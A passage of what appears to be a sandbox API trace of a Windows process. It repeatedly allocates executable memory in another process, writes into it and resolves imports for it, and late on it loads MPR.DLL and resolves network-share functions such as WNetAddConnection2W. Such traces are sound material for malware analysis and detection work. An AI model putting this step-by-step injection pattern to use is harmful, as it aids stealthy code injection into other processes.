	[0230.172] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.172] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.172] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.172] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47170, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.172] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.172] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.172] lstrlenA (lpString="HeapFree") returned 8
	[0230.172] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.173] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750628*, nSize=0x9, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750628*, lpNumberOfBytesWritten=0x12858c*=0x9) returned 1
	[0230.173] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.173] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.173] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.173] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.173] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.174] ResetEvent (hEvent=0x60c) returned 1
	[0230.174] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.174] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.174] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.174] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.174] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47174, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.175] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.175] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.175] lstrlenA (lpString="HeapReAlloc") returned 11
	[0230.175] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.175] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750634*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750634*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.175] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.175] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.175] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.176] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.176] ResetEvent (hEvent=0x60c) returned 1
	[0230.176] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.176] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.176] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.176] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.177] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47178, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.177] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.177] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.177] lstrlenA (lpString="Sleep") returned 5
	[0230.177] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.177] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750642*, nSize=0x6, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750642*, lpNumberOfBytesWritten=0x12858c*=0x6) returned 1
	[0230.185] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.185] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.185] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.185] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.186] ResetEvent (hEvent=0x60c) returned 1
	[0230.186] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.186] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.186] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.186] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.186] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.186] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4717c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.187] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.187] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.187] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0230.187] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.187] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275064a*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275064a*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0230.188] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.188] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.188] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.188] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.188] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.188] ResetEvent (hEvent=0x60c) returned 1
	[0230.188] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.189] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.189] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.189] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.189] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.189] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47180, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.189] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.189] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.189] lstrlenA (lpString="WriteFile") returned 9
	[0230.189] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.190] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750660*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750660*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0230.190] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.190] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.190] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.190] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.190] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.191] ResetEvent (hEvent=0x60c) returned 1
	[0230.191] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.191] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.191] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.191] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.191] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.191] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47184, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.192] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.192] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.192] lstrlenA (lpString="lstrcmpW") returned 8
	[0230.192] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.192] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275066c*, nSize=0x9, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275066c*, lpNumberOfBytesWritten=0x12858c*=0x9) returned 1
	[0230.192] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.192] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.192] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.193] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.193] ResetEvent (hEvent=0x60c) returned 1
	[0230.193] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.193] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.193] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.193] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.193] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.193] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47188, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.194] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.194] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.194] lstrlenA (lpString="lstrlenW") returned 8
	[0230.194] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.194] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750678*, nSize=0x9, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750678*, lpNumberOfBytesWritten=0x12858c*=0x9) returned 1
	[0230.195] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.195] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.195] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.195] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.195] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.195] ResetEvent (hEvent=0x60c) returned 1
	[0230.195] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.196] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.196] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.196] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.196] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.196] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4718c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.197] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.197] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2750840, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0230.197] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2750840, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=8 | out: lpWideCharStr="MPR.DLL") returned 8
	[0230.197] lstrlenW (lpString="MPR.DLL") returned 7
	[0230.197] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.197] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x10, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x10) returned 1
	[0230.197] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.197] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.197] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.197] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.198] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.198] ResetEvent (hEvent=0x60c) returned 1
	[0230.198] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.200] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.200] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.200] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.201] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.201] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.201] lstrlenA (lpString="WNetAddConnection2W") returned 19
	[0230.201] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.201] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750684*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750684*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0230.201] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.201] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.201] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.201] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.202] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.202] ResetEvent (hEvent=0x60c) returned 1
	[0230.202] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.202] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.202] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.202] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.202] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.202] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47194, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.203] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.203] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.203] lstrlenA (lpString="WNetCancelConnection2W") returned 22
	[0230.203] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.203] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275069a*, nSize=0x17, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275069a*, lpNumberOfBytesWritten=0x12858c*=0x17) returned 1
	[0230.204] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.204] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.204] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.204] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.204] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.204] ResetEvent (hEvent=0x60c) returned 1
	[0230.204] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.205] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.205] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.205] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.205] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.205] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47198, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.205] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.205] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.205] lstrlenA (lpString="WNetCloseEnum") returned 13
